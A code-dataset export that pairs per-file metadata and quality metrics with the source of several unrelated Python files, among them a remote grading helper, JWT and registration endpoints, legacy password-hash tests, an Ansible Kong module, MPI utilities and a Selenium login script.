| 0
| 0.020049
| 0.240178
| 11,225
| 321
| 97
| 34.968847
| 0.772541
| 0.132829
| 0
| 0.173913
| 0
| 0
| 0.25599
| 0
| 0
| 0
| 0
| 0
| 0.221739
| 1
| 0.091304
| false
| 0.052174
| 0.052174
| 0.004348
| 0.195652
| 0.004348
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07fd108f6337b8e7a88da0155cf318b6098e4ae4
| 2,585
|
py
|
Python
|
src/grader/machine.py
|
MrKaStep/csc230-grader
|
559846f4d921c5c4be6b6e9ba8629fb24b448e41
|
[
"MIT"
] | null | null | null |
src/grader/machine.py
|
MrKaStep/csc230-grader
|
559846f4d921c5c4be6b6e9ba8629fb24b448e41
|
[
"MIT"
] | null | null | null |
src/grader/machine.py
|
MrKaStep/csc230-grader
|
559846f4d921c5c4be6b6e9ba8629fb24b448e41
|
[
"MIT"
] | null | null | null |
import getpass
from plumbum import local
from plumbum.machines.paramiko_machine import ParamikoMachine
from plumbum.path.utils import copy
def _once(f):
res = None
def wrapped(*args, **kwargs):
nonlocal res
if res is None:
res = f(*args, **kwargs)
return res
return wrapped
@_once
def get_remote_machine_with_password(host, user):
password = getpass.getpass(prompt=f"Password for {user}@{host}: ", stream=None)
rem = ParamikoMachine(host, user=user, password=password)
return rem
@_once
def get_remote_machine(host, user, keyfile):
rem = ParamikoMachine(host, user=user, keyfile=keyfile)
return rem
def get_local_machine():
return local
def with_machine_rule(cls):
old_init = cls.__init__
def new_init(self, config):
if "machine" not in config:
machine_type = "local"
else:
machine_type = config["machine"]["type"]
if machine_type == "local":
self.machine = get_local_machine()
self.files_to_copy = None
elif machine_type == "remote":
if "keyfile" in config["machine"]:
self.machine = get_remote_machine(config["machine"]["host"], config["machine"]["user"], config["machine"]["keyfile"])
else:
self.machine = get_remote_machine_with_password(config["machine"]["host"], config["machine"]["user"])
self.files_to_copy = config["machine"].get("files_to_copy")
else:
raise ValueError(f"Invalid machine type: {config['machine']['type']}")
self.machine_type = machine_type
old_init(self, config)
cls.__init__ = new_init
old_apply = cls.apply
def new_apply(self, project):
with self.machine.tempdir() as tempdir:
project_path = tempdir / "project"
project_path.mkdir()
existing_files = set([f.name for f in project.root.list()])
if self.files_to_copy:
for fname in self.files_to_copy:
if fname in existing_files:
copy(project.root / fname, project_path / fname)
else:
for f in project.files():
if f.name in existing_files:
copy(f.path, project_path / f.name)
with self.machine.cwd(project_path):
self.session = self.machine.session()
self.session.run(f"cd {project_path}")
return old_apply(self, project)
cls.apply = new_apply
return cls
| 32.3125
| 133
| 0.600387
| 311
| 2,585
| 4.787781
| 0.215434
| 0.087307
| 0.036938
| 0.040296
| 0.20685
| 0.045668
| 0
| 0
| 0
| 0
| 0
| 0
| 0.292843
| 2,585
| 79
| 134
| 32.721519
| 0.814551
| 0
| 0
| 0.125
| 0
| 0
| 0.087848
| 0.010449
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0.078125
| 0.0625
| 0.015625
| 0.296875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07ff31219d3e42ddfa090b695c0d4b6ede8d31e9
| 2,826
|
py
|
Python
|
examples/token_freshness.py
|
greenape/flask-jwt-extended
|
11ac3bf0937ee199aea7d6dc47c748bef9bf1d2f
|
[
"MIT"
] | 2
|
2021-03-20T01:55:08.000Z
|
2021-11-14T12:20:23.000Z
|
examples/token_freshness.py
|
greenape/flask-jwt-extended
|
11ac3bf0937ee199aea7d6dc47c748bef9bf1d2f
|
[
"MIT"
] | 1
|
2020-08-06T23:02:45.000Z
|
2020-09-26T01:36:21.000Z
|
examples/token_freshness.py
|
greenape/flask-jwt-extended
|
11ac3bf0937ee199aea7d6dc47c748bef9bf1d2f
|
[
"MIT"
] | 1
|
2020-10-28T20:09:00.000Z
|
2020-10-28T20:09:00.000Z
|
from quart import Quart, jsonify, request
from quart_jwt_extended import (
JWTManager,
jwt_required,
create_access_token,
jwt_refresh_token_required,
create_refresh_token,
get_jwt_identity,
fresh_jwt_required,
)
app = Quart(__name__)
app.config["JWT_SECRET_KEY"] = "super-secret" # Change this!
jwt = JWTManager(app)
# Standard login endpoint. Will return a fresh access token and
# a refresh token
@app.route("/login", methods=["POST"])
async def login():
username = (await request.get_json()).get("username", None)
password = (await request.get_json()).get("password", None)
if username != "test" or password != "test":
return {"msg": "Bad username or password"}, 401
# create_access_token supports an optional 'fresh' argument,
# which marks the token as fresh or non-fresh accordingly.
# As we just verified their username and password, we are
# going to mark the token as fresh here.
ret = {
"access_token": create_access_token(identity=username, fresh=True),
"refresh_token": create_refresh_token(identity=username),
}
return ret, 200
# Refresh token endpoint. This will generate a new access token from
# the refresh token, but will mark that access token as non-fresh,
# as we do not actually verify a password in this endpoint.
@app.route("/refresh", methods=["POST"])
@jwt_refresh_token_required
async def refresh():
current_user = get_jwt_identity()
new_token = create_access_token(identity=current_user, fresh=False)
ret = {"access_token": new_token}
return ret, 200
# Fresh login endpoint. This is designed to be used if we need to
# make a fresh token for a user (by verifying they have the
# correct username and password). Unlike the standard login endpoint,
# this will only return a new access token, so that we don't keep
# generating new refresh tokens, which entirely defeats their point.
@app.route("/fresh-login", methods=["POST"])
async def fresh_login():
username = (await request.get_json()).get("username", None)
password = (await request.get_json()).get("password", None)
if username != "test" or password != "test":
return {"msg": "Bad username or password"}, 401
new_token = create_access_token(identity=username, fresh=True)
ret = {"access_token": new_token}
return ret, 200
# Any valid JWT can access this endpoint
@app.route("/protected", methods=["GET"])
@jwt_required
async def protected():
username = get_jwt_identity()
return dict(logged_in_as=username), 200
# Only fresh JWTs can access this endpoint
@app.route("/protected-fresh", methods=["GET"])
@fresh_jwt_required
async def protected_fresh():
username = get_jwt_identity()
return dict(fresh_logged_in_as=username), 200
if __name__ == "__main__":
app.run()
| 33.247059
| 75
| 0.714084
| 398
| 2,826
| 4.89196
| 0.28392
| 0.067797
| 0.043657
| 0.039034
| 0.402671
| 0.327684
| 0.276323
| 0.237288
| 0.154083
| 0.154083
| 0
| 0.009044
| 0.178344
| 2,826
| 84
| 76
| 33.642857
| 0.829457
| 0.31564
| 0
| 0.288462
| 0
| 0
| 0.13309
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.115385
| 0.038462
| 0
| 0.173077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
5805a2c8d616906daf19682b40baa91f10a88715
| 1,845
|
py
|
Python
|
app/routes/register.py
|
AuFeld/COAG
|
3874a9c1c6ceb908a6bbabfb49e2c701d8e54f20
|
[
"MIT"
] | 1
|
2021-06-03T10:29:12.000Z
|
2021-06-03T10:29:12.000Z
|
app/routes/register.py
|
AuFeld/COAG
|
3874a9c1c6ceb908a6bbabfb49e2c701d8e54f20
|
[
"MIT"
] | 45
|
2021-06-05T14:47:09.000Z
|
2022-03-30T06:16:44.000Z
|
app/routes/register.py
|
AuFeld/COAG
|
3874a9c1c6ceb908a6bbabfb49e2c701d8e54f20
|
[
"MIT"
] | null | null | null |
from typing import Callable, Optional, Type, cast
from fastapi import APIRouter, HTTPException, Request, status
from app.models import users
from app.common.user import ErrorCode, run_handler
from app.users.user import (
CreateUserProtocol,
InvalidPasswordException,
UserAlreadyExists,
ValidatePasswordProtocol,
)
def get_register_router(
create_user: CreateUserProtocol,
user_model: Type[users.BaseUser],
user_create_model: Type[users.BaseUserCreate],
after_register: Optional[Callable[[users.UD, Request], None]] = None,
validate_password: Optional[ValidatePasswordProtocol] = None,
) -> APIRouter:
"""Generate a router with the register route."""
router = APIRouter()
@router.post(
"/register", response_model=user_model, status_code=status.HTTP_201_CREATED
)
async def register(request: Request, user: user_create_model): # type: ignore
user = cast(users.BaseUserCreate, user) # Prevent mypy complain
if validate_password:
try:
await validate_password(user.password, user)
except InvalidPasswordException as e:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail={
"code": ErrorCode.REGISTER_INVALID_PASSWORD,
"reason": e.reason,
},
)
try:
created_user = await create_user(user, safe=True)
except UserAlreadyExists:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=ErrorCode.REGISTER_USER_ALREADY_EXISTS,
)
if after_register:
await run_handler(after_register, created_user, request)
return created_user
return router
| 32.946429
| 83
| 0.648238
| 184
| 1,845
| 6.293478
| 0.380435
| 0.018135
| 0.041451
| 0.051813
| 0.098446
| 0.098446
| 0.098446
| 0.098446
| 0.098446
| 0.098446
| 0
| 0.006767
| 0.279133
| 1,845
| 55
| 84
| 33.545455
| 0.86391
| 0.042276
| 0
| 0.133333
| 0
| 0
| 0.010795
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0.155556
| 0.111111
| 0
| 0.177778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed0fc8cf4f946e650eb4b14f0a5d7690952a62a3
| 980
|
py
|
Python
|
python/old_password_test.py
|
XelaRellum/old_password
|
b461941069bc7f1187776a992f86c89317ab215e
|
[
"MIT"
] | null | null | null |
python/old_password_test.py
|
XelaRellum/old_password
|
b461941069bc7f1187776a992f86c89317ab215e
|
[
"MIT"
] | null | null | null |
python/old_password_test.py
|
XelaRellum/old_password
|
b461941069bc7f1187776a992f86c89317ab215e
|
[
"MIT"
] | null | null | null |
import unittest
import pytest
from old_password import old_password
import csv
import re
@pytest.mark.parametrize("password,expected_hash", [
(None, None),
("", ""),
("a", "60671c896665c3fa"),
("abc", "7cd2b5942be28759"),
("ä", "0751368d49315f7f"),
])
def test_old_password(password, expected_hash):
assert old_password(password) == expected_hash
def test_password_with_space():
"""
spaces in password are skipped
"""
assert old_password("pass word") == old_password("password")
def test_password_with_tab():
"""
tabs in password are skipped
"""
assert old_password("pass\tword") == old_password("password")
def test_password_from_testdata():
with open("../testdata.csv", "r") as file:
for line in file:
line = line.strip()
password, expected_hash = line.split(";")
hash = old_password(password)
assert hash == expected_hash, "password: %s" % password
| 22.272727
| 67
| 0.643878
| 112
| 980
| 5.419643
| 0.383929
| 0.163097
| 0.156507
| 0.088962
| 0.349259
| 0.247117
| 0.135091
| 0.135091
| 0
| 0
| 0
| 0.04712
| 0.220408
| 980
| 43
| 68
| 22.790698
| 0.747382
| 0.060204
| 0
| 0
| 0
| 0
| 0.15618
| 0.024719
| 0
| 0
| 0
| 0
| 0.16
| 1
| 0.16
| false
| 0.48
| 0.2
| 0
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed4409f82d978378f6be973493d164c3f3a747dd
| 2,133
|
py
|
Python
|
stellar/config.py
|
gomyar/stellar
|
b2dfbe136f1540f0ca6ac5779ebaeae996a3b747
|
[
"MIT"
] | null | null | null |
stellar/config.py
|
gomyar/stellar
|
b2dfbe136f1540f0ca6ac5779ebaeae996a3b747
|
[
"MIT"
] | null | null | null |
stellar/config.py
|
gomyar/stellar
|
b2dfbe136f1540f0ca6ac5779ebaeae996a3b747
|
[
"MIT"
] | null | null | null |
import os
import logging
import yaml
from schema import Use, Schema, SchemaError, Optional
class InvalidConfig(Exception):
pass
class MissingConfig(Exception):
pass
default_config = {
'logging': 30,
'migrate_from_0_3_2': True
}
schema = Schema({
'stellar_url': Use(str),
'url': Use(str),
'project_name': Use(str),
'tracked_databases': [Use(str)],
Optional('logging'): int,
Optional('migrate_from_0_3_2'): bool
})
def get_config_path():
current_directory = os.getcwd()
while True:
try:
with open(
os.path.join(current_directory, 'stellar.yaml'),
'rb'
) as fp:
return os.path.join(current_directory, 'stellar.yaml')
except IOError:
pass
current_directory = os.path.abspath(
os.path.join(current_directory, '..')
)
if current_directory == '/':
return None
def load_config():
config = {}
stellar_config_env = os.getenv('STELLAR_CONFIG')
if stellar_config_env:
if os.path.exists(stellar_config_env):
config = yaml.safe_load(open(stellar_config_env))
else:
current_directory = os.getcwd()
while True:
try:
with open(
os.path.join(current_directory, 'stellar.yaml'),
'rb'
) as fp:
config = yaml.safe_load(fp)
break
except IOError:
pass
if current_directory == '/':
break
current_directory = os.path.abspath(
os.path.join(current_directory, '..')
)
if not config:
raise MissingConfig()
for k, v in default_config.items():
if k not in config:
config[k] = v
try:
return schema.validate(config)
except SchemaError as e:
raise InvalidConfig(e)
def save_config(config):
logging.getLogger(__name__).debug('save_config()')
with open(get_config_path(), "w") as fp:
yaml.dump(config, fp)
| 23.43956
| 70
| 0.554149
| 234
| 2,133
| 4.854701
| 0.307692
| 0.15493
| 0.044014
| 0.074824
| 0.310739
| 0.286092
| 0.286092
| 0.253521
| 0.253521
| 0.253521
| 0
| 0.005678
| 0.339428
| 2,133
| 90
| 71
| 23.7
| 0.800568
| 0
| 0
| 0.402778
| 0
| 0
| 0.078293
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0.055556
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed5bcaf7cb360ac7f0af74528df0eb589224f1a5
| 5,434
|
py
|
Python
|
library/kong_api.py
|
sebastienc/ansible-kong-module
|
c1e7b471a517d1ec99c5629f3729ebc34088bd64
|
[
"MIT"
] | 34
|
2016-03-09T17:10:52.000Z
|
2019-12-25T08:31:49.000Z
|
library/kong_api.py
|
sebastienc/ansible-kong-module
|
c1e7b471a517d1ec99c5629f3729ebc34088bd64
|
[
"MIT"
] | 6
|
2016-05-16T14:09:05.000Z
|
2018-07-23T21:09:33.000Z
|
library/kong_api.py
|
sebastienc/ansible-kong-module
|
c1e7b471a517d1ec99c5629f3729ebc34088bd64
|
[
"MIT"
] | 23
|
2016-02-17T12:18:16.000Z
|
2021-05-06T09:39:35.000Z
|
#!/usr/bin/python
DOCUMENTATION = '''
---
module: kong
short_description: Configure a Kong API Gateway
'''
EXAMPLES = '''
- name: Register a site
kong:
kong_admin_uri: http://127.0.0.1:8001/apis/
name: "Mockbin"
taget_url: "http://mockbin.com"
request_host: "mockbin.com"
state: present
- name: Delete a site
kong:
kong_admin_uri: http://127.0.0.1:8001/apis/
name: "Mockbin"
state: absent
'''
import json, requests, os
class KongAPI:
def __init__(self, base_url, auth_username=None, auth_password=None):
self.base_url = base_url
if auth_username is not None and auth_password is not None:
self.auth = (auth_username, auth_password)
else:
self.auth = None
def __url(self, path):
return "{}{}" . format (self.base_url, path)
def _api_exists(self, name, api_list):
for api in api_list:
if name == api.get("name", None):
return True
return False
def add_or_update(self, name, upstream_url, request_host=None, request_path=None, strip_request_path=False, preserve_host=False):
method = "post"
url = self.__url("/apis/")
api_list = self.list().json().get("data", [])
api_exists = self._api_exists(name, api_list)
if api_exists:
method = "patch"
url = "{}{}" . format (url, name)
data = {
"name": name,
"upstream_url": upstream_url,
"strip_request_path": strip_request_path,
"preserve_host": preserve_host
}
if request_host is not None:
data['request_host'] = request_host
if request_path is not None:
data['request_path'] = request_path
return getattr(requests, method)(url, data, auth=self.auth)
def list(self):
url = self.__url("/apis")
return requests.get(url, auth=self.auth)
def info(self, id):
url = self.__url("/apis/{}" . format (id))
return requests.get(url, auth=self.auth)
def delete_by_name(self, name):
info = self.info(name)
id = info.json().get("id")
return self.delete(id)
def delete(self, id):
path = "/apis/{}" . format (id)
url = self.__url(path)
return requests.delete(url, auth=self.auth)
class ModuleHelper:
def __init__(self, fields):
self.fields = fields
def get_module(self):
args = dict(
kong_admin_uri = dict(required=False, type='str'),
kong_admin_username = dict(required=False, type='str'),
kong_admin_password = dict(required=False, type='str'),
name = dict(required=False, type='str'),
upstream_url = dict(required=False, type='str'),
request_host = dict(required=False, type='str'),
request_path = dict(required=False, type='str'),
strip_request_path = dict(required=False, default=False, type='bool'),
preserve_host = dict(required=False, default=False, type='bool'),
state = dict(required=False, default="present", choices=['present', 'absent', 'latest', 'list', 'info'], type='str'),
)
return AnsibleModule(argument_spec=args,supports_check_mode=False)
def prepare_inputs(self, module):
url = module.params['kong_admin_uri']
auth_user = module.params['kong_admin_username']
auth_password = module.params['kong_admin_password']
state = module.params['state']
data = {}
for field in self.fields:
value = module.params.get(field, None)
if value is not None:
data[field] = value
return (url, data, state, auth_user, auth_password)
def get_response(self, response, state):
if state == "present":
meta = response.json()
has_changed = response.status_code in [201, 200]
if state == "absent":
meta = {}
has_changed = response.status_code == 204
if state == "list":
meta = response.json()
has_changed = False
return (has_changed, meta)
def main():
fields = [
'name',
'upstream_url',
'request_host',
'request_path',
'strip_request_path',
'preserve_host'
]
helper = ModuleHelper(fields)
global module # might not need this
module = helper.get_module()
base_url, data, state, auth_user, auth_password = helper.prepare_inputs(module)
api = KongAPI(base_url, auth_user, auth_password)
if state == "present":
response = api.add_or_update(**data)
if state == "absent":
response = api.delete_by_name(data.get("name"))
if state == "list":
response = api.list()
if response.status_code == 401:
module.fail_json(msg="Please specify kong_admin_username and kong_admin_password", meta=response.json())
elif response.status_code == 403:
module.fail_json(msg="Please check kong_admin_username and kong_admin_password", meta=response.json())
else:
has_changed, meta = helper.get_response(response, state)
module.exit_json(changed=has_changed, meta=meta)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
| 30.188889
| 133
| 0.597902
| 662
| 5,434
| 4.685801
| 0.193353
| 0.034816
| 0.054803
| 0.047389
| 0.303997
| 0.199871
| 0.179884
| 0.088975
| 0.066409
| 0.066409
| 0
| 0.008947
| 0.280088
| 5,434
| 179
| 134
| 30.357542
| 0.783998
| 0.006625
| 0
| 0.145985
| 0
| 0
| 0.159036
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094891
| false
| 0.072993
| 0.021898
| 0.007299
| 0.211679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed7d1c9bb5710045f4cb95dccf219d3b5c6faaa9
| 2,564
|
py
|
Python
|
pyfisher/mpi.py
|
borisbolliet/pyfisher
|
715e192baa4fadbff754416d2b001c3708c9276c
|
[
"BSD-3-Clause"
] | 7
|
2017-12-06T18:16:13.000Z
|
2021-02-09T19:25:26.000Z
|
pyfisher/mpi.py
|
borisbolliet/pyfisher
|
715e192baa4fadbff754416d2b001c3708c9276c
|
[
"BSD-3-Clause"
] | 34
|
2016-01-25T19:48:07.000Z
|
2021-02-03T22:34:09.000Z
|
pyfisher/mpi.py
|
borisbolliet/pyfisher
|
715e192baa4fadbff754416d2b001c3708c9276c
|
[
"BSD-3-Clause"
] | 10
|
2017-02-01T15:14:22.000Z
|
2021-02-16T01:34:16.000Z
|
from __future__ import print_function
import numpy as np
import os,sys,time
"""
Copied from orphics.mpi
"""
try:
disable_mpi_env = os.environ['DISABLE_MPI']
disable_mpi = True if disable_mpi_env.lower().strip() == "true" else False
except:
disable_mpi = False
"""
Use the below cleanup stuff only for intel-mpi!
If you use it on openmpi, you will have no traceback for errors
causing hours of endless confusion and frustration! - Sincerely, past frustrated Mat
"""
# From Sigurd's enlib.mpi:
# Uncaught exceptions don't cause mpi to abort. This can lead to thousands of
# wasted CPU hours
# def cleanup(type, value, traceback):
# sys.__excepthook__(type, value, traceback)
# MPI.COMM_WORLD.Abort(1)
# sys.excepthook = cleanup
class fakeMpiComm:
"""
A Simple Fake MPI implementation
"""
def __init__(self):
pass
def Get_rank(self):
return 0
def Get_size(self):
return 1
def Barrier(self):
pass
def Abort(self,dummy):
pass
try:
if disable_mpi: raise
from mpi4py import MPI
except:
if not(disable_mpi): print("WARNING: mpi4py could not be loaded. Falling back to fake MPI. This means that if you submitted multiple processes, they will all be assigned the same rank of 0, and they are potentially doing the same thing.")
class template:
pass
MPI = template()
MPI.COMM_WORLD = fakeMpiComm()
def mpi_distribute(num_tasks,avail_cores,allow_empty=False):
# copied to mapsims.convert_noise_templates
if not(allow_empty): assert avail_cores<=num_tasks
min_each, rem = divmod(num_tasks,avail_cores)
num_each = np.array([min_each]*avail_cores) # first distribute equally
if rem>0: num_each[-rem:] += 1 # add the remainder to the last set of cores (so that rank 0 never gets extra jobs)
task_range = list(range(num_tasks)) # the full range of tasks
cumul = np.cumsum(num_each).tolist() # the end indices for each task
task_dist = [task_range[x:y] for x,y in zip([0]+cumul[:-1],cumul)] # a list containing the tasks for each core
assert sum(num_each)==num_tasks
assert len(num_each)==avail_cores
assert len(task_dist)==avail_cores
return num_each,task_dist
def distribute(njobs,verbose=True,**kwargs):
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
numcores = comm.Get_size()
num_each,each_tasks = mpi_distribute(njobs,numcores,**kwargs)
if rank==0: print ("At most ", max(num_each) , " tasks...")
my_tasks = each_tasks[rank]
return comm,rank,my_tasks
| 29.813953
| 242
| 0.697738
| 391
| 2,564
| 4.409207
| 0.432225
| 0.032483
| 0.020882
| 0.020882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0059
| 0.206708
| 2,564
| 85
| 243
| 30.164706
| 0.841691
| 0.207878
| 0
| 0.166667
| 0
| 0.020833
| 0.135747
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.145833
| false
| 0.083333
| 0.083333
| 0.041667
| 0.354167
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
9c13630030f6d62b875010ab48a5f1a305094328
| 1,266
|
py
|
Python
|
nadmin/plugins/sortable.py
|
A425/django-xadmin-1.8
|
9ab06192311b22ec654778935ce3e3c5ffd39a00
|
[
"MIT"
] | 1
|
2015-10-10T08:04:26.000Z
|
2015-10-10T08:04:26.000Z
|
nadmin/plugins/sortable.py
|
A425/django-xadmin-1.8
|
9ab06192311b22ec654778935ce3e3c5ffd39a00
|
[
"MIT"
] | 1
|
2016-03-25T01:41:36.000Z
|
2016-03-25T01:41:36.000Z
|
nadmin/plugins/sortable.py
|
A425/django-xadmin-1.8
|
9ab06192311b22ec654778935ce3e3c5ffd39a00
|
[
"MIT"
] | null | null | null |
#coding:utf-8
from nadmin.sites import site
from nadmin.views import BaseAdminPlugin, ListAdminView
SORTBY_VAR = '_sort_by'
class SortablePlugin(BaseAdminPlugin):
sortable_fields = ['sort']
# Media
def get_media(self, media):
if self.sortable_fields and self.request.GET.get(SORTBY_VAR):
media = media + self.vendor('nadmin.plugin.sortable.js')
return media
# Block Views
def block_top_toolbar(self, context, nodes):
if self.sortable_fields:
pass
# current_refresh = self.request.GET.get(REFRESH_VAR)
# context.update({
# 'has_refresh': bool(current_refresh),
# 'clean_refresh_url': self.admin_view.get_query_string(remove=(REFRESH_VAR,)),
# 'current_refresh': current_refresh,
# 'refresh_times': [{
# 'time': r,
# 'url': self.admin_view.get_query_string({REFRESH_VAR: r}),
# 'selected': str(r) == current_refresh,
# } for r in self.refresh_times],
# })
# nodes.append(loader.render_to_string('nadmin/blocks/refresh.html', context_instance=context))
site.register_plugin(SortablePlugin, ListAdminView)
| 34.216216
| 107
| 0.611374
| 139
| 1,266
| 5.330935
| 0.453237
| 0.094467
| 0.037787
| 0.053981
| 0.080972
| 0.080972
| 0.080972
| 0
| 0
| 0
| 0
| 0.001093
| 0.277251
| 1,266
| 36
| 108
| 35.166667
| 0.808743
| 0.436809
| 0
| 0
| 0
| 0
| 0.053009
| 0.035817
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0.076923
| 0.153846
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
9c48342a450b3888ddd355595c9462c4c225a106
| 2,880
|
py
|
Python
|
account_processing.py
|
amitjoshi9627/Playong
|
d54a8db05ae5035e122b8bc8d84c849f25483005
|
[
"MIT"
] | 4
|
2019-04-22T15:16:45.000Z
|
2020-01-17T12:57:09.000Z
|
account_processing.py
|
amitjoshi9627/Playong
|
d54a8db05ae5035e122b8bc8d84c849f25483005
|
[
"MIT"
] | null | null | null |
account_processing.py
|
amitjoshi9627/Playong
|
d54a8db05ae5035e122b8bc8d84c849f25483005
|
[
"MIT"
] | null | null | null |
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
import getpass
import time
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from utils import *
def login_user(browser, email='', password=''):
print('Redirecting to login page..')
browser.find_element_by_xpath('//*[@id="login-btn"]').click()
if email is '':
email, password = take_credentials()
browser.find_element_by_id("login_username").send_keys(email)
browser.find_element_by_id("login_password").send_keys(password)
complete_captcha(browser)
time.sleep(4)
browser.find_element_by_xpath('//*[@id="static-login-btn"]').click()
def logout_user(browser):
print("\nThank you for your using the program! Logging you out from jiosaavn...")
show_notificaton("Thank", "You", 0)
action = ActionChains(browser)
menu = browser.find_element_by_class_name('user-name')
action.move_to_element(menu).perform()
menu.click()
browser.find_element_by_xpath(
'/html/body/div[2]/div/div[2]/div[3]/div[3]/ol/li[4]/a').click()
time.sleep(2)
print('Logout..successful...')
def check_credentials(browser):
print('Checking credentials...Please wait..')
time.sleep(5)
try:
close_promo_ad(browser)
accept_cookies(browser)
success = True
except:
success = False
return success
def wrong_credentials_check(browser, counts=1):
while success != True:
print("\nWrong username/password entered.Please try again...\n")
email = input("Enter your email for jiosaavn account: ")
password = getpass.getpass(f"Enter password for {email}: ")
email_element = browser.find_element_by_id("login_username")
email_element.clear()
email_element.send_keys(email)
pswd_element = browser.find_element_by_id("login_password")
pswd_element.clear()
pswd_element.send_keys(password)
browser.find_element_by_xpath('//*[@id="static-login-btn"]').click()
success = check_credentials(browser)
counts += 1
if counts > 4:
print('Too many unsuccessful attempts done. Exiting...\n')
break
return counts
def go_without_login(browser):
return False
def take_credentials():
email = input("Enter your email for jiosaavn account: ")
password = getpass.getpass(f"Enter password for {email}: ")
return email, password
def prompt(browser):
# response = int(input("Press 1 to Log in with you account else Press 0: "))
# if response:
# login_user(browser)
# return True
# else:
# go_without_login(browser)
print("Due to some issues.. Login Option is not available currently! Sorry for the inconvenience caused.")
go_without_login(browser)
| 32.359551
| 110
| 0.682986
| 370
| 2,880
| 5.140541
| 0.345946
| 0.05205
| 0.085174
| 0.094637
| 0.247108
| 0.233964
| 0.219769
| 0.138801
| 0.138801
| 0.138801
| 0
| 0.006061
| 0.197917
| 2,880
| 88
| 111
| 32.727273
| 0.817316
| 0.056597
| 0
| 0.092308
| 0
| 0.015385
| 0.254982
| 0.047232
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107692
| false
| 0.153846
| 0.107692
| 0.015385
| 0.276923
| 0.107692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
92e1c91fec4c34f39e9e2622024fad4489b61749
| 5,279
|
py
|
Python
|
scripts/C189/C189Checkin.py
|
xiaopowanyi/py_scripts
|
29f240800eefd6e0f91fd098c35ac3c451172ff8
|
[
"MIT"
] | 2
|
2020-11-14T05:42:49.000Z
|
2020-11-14T05:43:13.000Z
|
scripts/C189/C189Checkin.py
|
J220541674/py_scripts
|
2b72e23041392a2e5f0a7305d7e9802054978384
|
[
"MIT"
] | null | null | null |
scripts/C189/C189Checkin.py
|
J220541674/py_scripts
|
2b72e23041392a2e5f0a7305d7e9802054978384
|
[
"MIT"
] | null | null | null |
import requests, time, re, rsa, json, base64
from urllib import parse
s = requests.Session()
username = ""
password = ""
if(username == "" or password == ""):
